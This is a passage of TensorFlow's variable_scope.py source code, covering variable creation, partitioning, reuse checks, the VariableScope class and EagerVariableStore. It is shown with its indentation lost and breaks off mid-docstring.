`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Set trainable value based on synchronization value.
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
reuse_without_partition = reuse and not partitioner
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if not reuse_without_partition:
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable (%s) must be "
"fully defined, but instead was %s." % (name, shape))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
partitions = partitioner(shape=shape, dtype=dtype)
if not isinstance(partitions, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% partitions)
if len(partitions) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (partitions, shape))
if any([p < 1 for p in partitions]):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
partitions)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (not reuse_without_partition and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, slice_shape = _compute_slice_dim_and_shape(
shape.as_list(), partitions)
vs = []
num_slices = partitions[slice_dim]
num_slices_with_excess = shape[slice_dim].value % num_slices
slice_offset = [0] * shape.ndims
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
for i in xrange(num_slices):
var_shape = slice_shape[:]
var_offset = slice_offset[:]
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
if i < num_slices_with_excess:
var_shape[slice_dim] += 1
slice_offset[slice_dim] += var_shape[slice_dim]
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
# pylint: disable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
# pylint: enable=protected-access
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
tb = self._vars[name].op.traceback[::-1]
# Throw away internal tf entries and only take a few lines.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
raise ValueError("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope? "
"Originally defined at:\n\n%s" % (
name, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
if shape and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
elif not tf_inspect.getargspec(initializer).args:
init_val = initializer
else:
raise ValueError("You can only pass an initializer function that "
"expects no arguments to its callable when the "
"shape is not fully defined. The given initializer "
"function expects the following args %s" %
tf_inspect.getargspec(initializer).args)
variable_dtype = dtype.base_dtype
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
if self._partitioner is not None:
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
if partitioner and context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets an existing variable with this name or create a new one."""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=self.reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
